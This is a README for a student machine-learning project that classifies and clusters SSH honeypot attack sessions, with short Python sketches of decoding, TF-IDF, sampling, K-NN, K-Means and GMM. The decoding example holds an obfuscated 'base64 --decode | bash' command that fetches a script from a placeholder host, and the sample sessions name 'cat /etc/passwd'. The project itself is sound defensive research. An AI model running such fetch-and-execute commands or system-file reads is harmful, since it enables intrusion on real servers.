SSH Attack Detection Using Machine Learning

This README provides a comprehensive overview of the SSH Attack Detection project using machine learning techniques. For a more detailed explanation of the project, including data analysis, methodologies, and in-depth results, please refer to the SSH_ATTACKS_FINAL_VERSION.pdf file located in the project directory.
The PDF contains all the technical details, charts, and metrics that were part of this project. It is recommended to review the document for a deeper understanding of the results and the reasoning behind our machine learning models.

Overview

This project investigates the use of machine learning algorithms to detect and classify SSH shell attacks. It is inspired by the growing importance of network security, particularly in detecting malicious attempts on SSH servers. By leveraging both supervised and unsupervised learning models, this project aims to identify attack patterns and enhance the ability to predict future attacks with greater accuracy.

The dataset used consists of over 233,000 rows, each representing a session with a set of commands executed by attackers on a honeypot environment. This project focuses on transforming raw session data into meaningful insights through various machine learning techniques.

Authors

Lorenzo Ferretti (s331942)
Alessio Mantineo (s324267)
Carmen Moncada (s296675)
Riccardo Tommasi (s323816)

Introduction

SSH is a critical protocol for remote server access, which makes it a common target for attackers. This project focuses on detecting and classifying attacks with machine learning models trained on historical session data, with real-time detection as a longer-term goal. The aim is to improve the identification of malicious activity using algorithms that learn from past attacks.

Machine learning techniques offer promising solutions to quickly analyze and detect abnormal patterns that might otherwise go unnoticed by human analysts. The dataset used for this project captures command sequences executed by attackers on a honeypot and provides a unique opportunity to apply machine learning to cybersecurity.

Dataset and Pre-Processing

Data Exploration

The dataset contains more than 230,000 rows, with each row representing a complete SSH session. Attack sessions contain a sequence of commands executed by an attacker. For the purpose of this analysis, benign sessions were filtered out, and only attack-related sessions were retained.

Key observations:

The frequency of attacks varies over time, with notable peaks around the end of 2019 and early 2020. These peaks may correspond to periods in which companies have reduced activity or fewer monitoring personnel.
Most attacks fall into categories such as "Discovery," "Persistence," and "Execution," with "Defense Evasion" and other intents being less frequent.

Pre-Processing: Improving Data Quality

The raw dataset consists of sessions with commands that are often encoded (e.g., base64 encoding). We applied decoding techniques to make these commands readable and actionable for the analysis.

Key Steps:

A base64 decoding function was applied to de-obfuscate encoded commands, so that the malicious activity they hide is visible to the later analysis steps.
Command sequences were split and processed into structured formats, using techniques like Term Frequency-Inverse Document Frequency (TF-IDF) to transform raw text into numerical features.
Data was cleaned to remove irrelevant information, including temporary files and unrelated command sequences.
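
The decoding step above can be sketched as follows. This is a minimal illustration rather than the project's actual function: the name decode_base64_tokens, the regular expression, and the 16-character minimum length are all assumptions made for the example.

```python
import base64
import binascii
import re

# Candidate tokens: runs of 16+ base64 characters, optionally padded.
# The minimum length of 16 is an arbitrary threshold chosen for this sketch.
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")


def decode_base64_tokens(command: str) -> str:
    """Replace each base64-looking token with its decoded text when possible."""

    def _decode(match: re.Match) -> str:
        token = match.group(0)
        try:
            raw = base64.b64decode(token, validate=True)
            return raw.decode("utf-8")
        except (binascii.Error, UnicodeDecodeError):
            # Not valid base64, or not text once decoded: keep the token as-is.
            return token

    return B64_TOKEN.sub(_decode, command)


# Build an obfuscated command the way an attacker might (hypothetical payload).
encoded = base64.b64encode(b"wget http://example.com/x.sh").decode("ascii")
session = f'echo "{encoded}" | base64 --decode | bash'
decoded = decode_base64_tokens(session)
```

Tokens that fail strict decoding are left untouched, so ordinary long arguments such as file paths are not corrupted by the pass.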

Transformation Techniques

To convert the text data into a usable format for machine learning models, we used TF-IDF to generate feature vectors. Each command in a session is weighted by how often it appears in that session, scaled down by how common it is across all sessions. This produced a structured dataset that classification and clustering algorithms can process directly.
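
To make the weighting concrete, here is a small pure-Python sketch of textbook TF-IDF, tf × log(N / df). It is not the project's code: the tfidf function and the sample sessions are hypothetical, and library implementations such as scikit-learn's TfidfVectorizer apply smoothing and normalization by default, so their values differ from the ones computed here.

```python
import math
from collections import Counter


def tfidf(sessions: list[list[str]]) -> tuple[list[str], list[list[float]]]:
    """Return the vocabulary and one TF-IDF vector per session."""
    n_docs = len(sessions)
    vocab = sorted({token for session in sessions for token in session})
    # Document frequency: number of sessions that contain each token.
    doc_freq = Counter(token for session in sessions for token in set(session))
    idf = {token: math.log(n_docs / doc_freq[token]) for token in vocab}

    vectors = []
    for session in sessions:
        counts = Counter(session)
        total = len(session) or 1  # avoid dividing by zero on empty sessions
        vectors.append([counts[t] / total * idf[t] for t in vocab])
    return vocab, vectors


# Hypothetical tokenized sessions, one list of tokens per session.
sessions = [
    ["cat", "/proc/cpuinfo", "uname"],
    ["uname", "wget", "chmod"],
    ["uname", "cat", "/etc/passwd"],
]
vocab, vectors = tfidf(sessions)
```

In this toy input, uname appears in every session and therefore receives a weight of zero, while wget, which appears in only one session, receives the highest weight in its row.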

Data Sampling

Given the size of the dataset, we drew a sample to reduce the computational load. The sample contains 5,853 sessions and was chosen to remain representative of the full set of attack categories.
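
One common way to keep a sample representative is stratified sampling, where the same fraction is drawn from every category group. The sketch below assumes that approach; the README does not state which sampling method was used, and the stratified_sample function, the toy rows, and the 10% fraction are illustrative only.

```python
import random
from collections import defaultdict


def stratified_sample(rows, key, fraction, seed=0):
    """Sample roughly `fraction` of the rows from each stratum defined by `key`."""
    rng = random.Random(seed)
    strata = defaultdict(list)
    for row in rows:
        strata[key(row)].append(row)

    sample = []
    for members in strata.values():
        # Keep at least one row per stratum so rare categories survive.
        k = max(1, round(len(members) * fraction))
        sample.extend(rng.sample(members, k))
    return sample


# Hypothetical sessions; the label tuple of each row acts as its stratum.
rows = (
    [{"id": i, "labels": ("Discovery", "Persistence")} for i in range(900)]
    + [{"id": 900 + i, "labels": ("Execution",)} for i in range(90)]
    + [{"id": 990 + i, "labels": ("Impact",)} for i in range(10)]
)
sample = stratified_sample(rows, key=lambda r: r["labels"], fraction=0.1)
```

Using the full label combination as the stratum key preserves the proportions of multi-label sessions, at the cost of creating many small strata when combinations are numerous.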

Standardization of Multi-Label Categories

MultiLabelBinarizer (the scikit-learn transformer of that name) was used to encode the multi-label targets, since each session can belong to several attack categories at once. It turns each session's set of categories into a binary indicator vector, the form that supervised learning algorithms expect.
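
The encoding itself is simple enough to show by hand. The following pure-Python sketch produces the same kind of indicator matrix that a multi-label binarizer yields; the binarize_labels function and the example label sets are hypothetical.

```python
def binarize_labels(label_sets):
    """Map each collection of labels to a row of 0/1 indicators."""
    classes = sorted({label for labels in label_sets for label in labels})
    matrix = [[1 if c in labels else 0 for c in classes] for labels in label_sets]
    return classes, matrix


# Hypothetical sessions, each tagged with one or more attack categories.
label_sets = [
    {"Discovery", "Persistence"},
    {"Execution"},
    {"Discovery", "Execution", "Persistence"},
]
classes, matrix = binarize_labels(label_sets)
# classes -> ["Discovery", "Execution", "Persistence"]
# matrix  -> [[1, 0, 1], [0, 1, 0], [1, 1, 1]]
```

Each column then acts as an independent binary target, which is what lets a classifier predict several categories for the same session.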

Supervised Learning Models

Random Forest

Random Forest is an ensemble classifier that uses multiple decision trees to make predictions. In this project, it was used to classify attack sessions based on the transformed features.

Key Metrics:

High accuracy (~98%) on both training and test sets.
Precision, recall, and F1-scores were high for categories like "Discovery" and "Execution," but performance was lower for less common categories like "Harmless" and "Impact."
Overfitting was detected in some categories, particularly for those with lower support.

K-Nearest Neighbors (K-NN)

The K-NN algorithm classifies a session by finding the most common labels among its nearest neighbors in the dataset. This model performed comparably to Random Forest, with similar levels of accuracy but more balanced performance across smaller classes.
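
A minimal multi-label K-NN can be sketched in a few lines. The voting rule used here (keep every label held by more than half of the k neighbors), the Euclidean distance, and the two-dimensional toy features are assumptions for illustration and may differ from the configuration used in the project.

```python
import math
from collections import Counter


def knn_predict(train_x, train_y, query, k=3):
    """Return the labels held by more than half of the k nearest neighbors."""
    # Rank training points by Euclidean distance to the query.
    ranked = sorted(
        range(len(train_x)),
        key=lambda i: math.dist(train_x[i], query),
    )
    neighbors = ranked[:k]
    # Label sets guarantee at most one vote per label per neighbor.
    votes = Counter(label for i in neighbors for label in train_y[i])
    return {label for label, count in votes.items() if count > k / 2}


# Hypothetical 2-D feature vectors and their label sets.
train_x = [[1.0, 0.0], [0.9, 0.1], [0.0, 1.0], [0.1, 0.9], [0.8, 0.3]]
train_y = [
    {"Discovery"},
    {"Discovery", "Persistence"},
    {"Execution"},
    {"Execution"},
    {"Discovery", "Persistence"},
]
predicted = knn_predict(train_x, train_y, query=[0.85, 0.2], k=3)
```

Because the prediction depends only on nearby points, a small class can still be recovered whenever its members sit close together in feature space.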

Key Metrics:

K-NN demonstrated better macro-average F1-scores for smaller classes like "Impact" and "Other."
Overfitting was still present, but to a lesser degree compared to Random Forest.
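
The difference between overall scores and scores on small classes comes down to how per-class F1 values are averaged. The sketch below contrasts macro and weighted averaging; the per-class counts are invented for illustration and are not results from this project.

```python
def f1(tp, fp, fn):
    """F1 from true positives, false positives, and false negatives."""
    denom = 2 * tp + fp + fn
    return 2 * tp / denom if denom else 0.0


# Hypothetical per-class counts as (tp, fp, fn). Not results from this project.
counts = {
    "Discovery": (950, 10, 10),
    "Execution": (900, 20, 20),
    "Impact": (2, 3, 6),
}

per_class = {name: f1(*c) for name, c in counts.items()}
# Support is the number of true instances of each class.
support = {name: tp + fn for name, (tp, fp, fn) in counts.items()}

# Macro: every class counts equally, so rare classes pull the score down.
macro_f1 = sum(per_class.values()) / len(per_class)
# Weighted: classes count in proportion to their support.
weighted_f1 = sum(per_class[n] * support[n] for n in counts) / sum(support.values())
```

With these toy numbers the weighted average stays above 0.98 while the macro average falls to roughly 0.76, which is why macro-average F1 is the more informative figure for rare categories.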

Unsupervised Learning Models

K-Means

K-Means clustering was applied to group sessions into clusters based on their command sequences. By tuning the number of clusters, we were able to analyze the natural grouping of attack types.
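
For readers unfamiliar with the algorithm, here is a compact pure-Python sketch of Lloyd's algorithm, the standard K-Means procedure. The kmeans function, the fixed iteration count, and the toy points are assumptions for the example; the project most likely relied on a library implementation.

```python
import math
import random


def kmeans(points, k, iterations=20, seed=0):
    """Lloyd's algorithm: alternate an assignment step and an update step."""
    rng = random.Random(seed)
    centroids = rng.sample(points, k)  # start from k distinct data points
    labels = [0] * len(points)
    for _ in range(iterations):
        # Assignment step: each point joins its nearest centroid.
        labels = [
            min(range(k), key=lambda c: math.dist(p, centroids[c]))
            for p in points
        ]
        # Update step: move each centroid to the mean of its members.
        for c in range(k):
            members = [p for p, label in zip(points, labels) if label == c]
            if members:  # an empty cluster keeps its previous centroid
                centroids[c] = [sum(dim) / len(members) for dim in zip(*members)]
    return labels, centroids


# Hypothetical 2-D points forming two well-separated groups.
points = [[0.0, 0.1], [0.2, 0.0], [0.1, 0.2], [5.0, 5.1], [5.2, 4.9], [4.9, 5.0]]
labels, centroids = kmeans(points, k=2)
```

Tuning the number of clusters then amounts to rerunning this procedure for several values of k and comparing a quality measure such as within-cluster distance.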

Gaussian Mixture Model (GMM)

The GMM algorithm was also applied for clustering, allowing for more flexibility by modeling clusters as Gaussian distributions. Both clustering models revealed meaningful patterns in the dataset, particularly in distinguishing between different types of attacks.
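
What sets a GMM apart from K-Means is that assignments are soft: each point receives a probability of belonging to every component. The sketch below computes these probabilities (the E-step of the EM algorithm) for a one-dimensional mixture; the mixture parameters are hypothetical, and a real model over TF-IDF features would be multivariate.

```python
import math


def gaussian_pdf(x, mean, std):
    """Density of a 1-D normal distribution at x."""
    z = (x - mean) / std
    return math.exp(-0.5 * z * z) / (std * math.sqrt(2 * math.pi))


def responsibilities(x, weights, means, stds):
    """E-step of a GMM: posterior probability of each component given x."""
    joint = [w * gaussian_pdf(x, m, s) for w, m, s in zip(weights, means, stds)]
    total = sum(joint)
    return [j / total for j in joint]


# Hypothetical two-component mixture over a single feature.
weights, means, stds = [0.5, 0.5], [0.0, 4.0], [1.0, 1.0]
near_first = responsibilities(0.5, weights, means, stds)
midpoint = responsibilities(2.0, weights, means, stds)
```

A point close to the first mean is assigned to it almost entirely, whereas a point halfway between the two means is split evenly, something a hard K-Means assignment cannot express.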

Language Models and Neural Networks

Doc2Vec and Neural Network Model

The Doc2Vec model was used to represent the text data as vectors, which were then fed into a neural network built using Keras. This model aimed to capture deeper relationships between command sequences that were not evident from traditional methods.

Key Steps:

The neural network model was trained on the vectorized data using various hyperparameter combinations, including different vector sizes (100, 300, and 800) and learning rates.
Experiments showed that larger vector sizes led to better performance but required more computational resources.

Results and Analysis

Hyper-Parameter Tuning

Both supervised models were tuned with a grid search over their hyper-parameters. Random Forest achieved its best performance with 30 estimators and a maximum depth of 10, resulting in a weighted F1-score of 99.2%.
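
The idea behind a grid search is to score every combination of candidate settings and keep the best one. The sketch below shows that loop in plain Python. The grid values and the toy_score function are placeholders: only the values 30 and 10 come from the text above, and the scoring function is a stand-in for cross-validated weighted F1, not a reproduction of any real result.

```python
from itertools import product


def grid_search(param_grid, evaluate):
    """Score every parameter combination and return the best one."""
    names = list(param_grid)
    best_params, best_score = None, float("-inf")
    for values in product(*(param_grid[n] for n in names)):
        params = dict(zip(names, values))
        score = evaluate(params)
        if score > best_score:
            best_params, best_score = params, score
    return best_params, best_score


# Hypothetical grid; only 30 estimators and depth 10 appear in the text above.
param_grid = {"n_estimators": [10, 30, 100], "max_depth": [5, 10, 20]}


def toy_score(params):
    """Placeholder objective standing in for cross-validated weighted F1."""
    return -abs(params["n_estimators"] - 30) - abs(params["max_depth"] - 10)


best_params, best_score = grid_search(param_grid, toy_score)
```

In practice the evaluate callback would train the model with the given parameters and return a validation score, so the cost of the search grows with the product of the grid sizes.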

Clustering Analysis

The clusters generated by K-Means and GMM revealed interesting patterns in the data, such as the concentration of "Persistence" and "Discovery" attacks towards the end of 2019. These insights could potentially help predict when similar attacks might occur in the future.

Final Considerations

The results indicate that machine learning models can be highly effective in identifying attack patterns within SSH session data. While Random Forest and K-NN models performed well, further improvements could be achieved by addressing the class imbalance, especially for less frequent attack categories.

Conclusion

This project demonstrates the feasibility of using machine learning models for detecting SSH attacks. Through supervised classification and unsupervised clustering, we were able to accurately predict attack types and identify patterns in large datasets. Future work could focus on refining the models to handle less common attack types more effectively and applying these techniques in real-time detection systems.
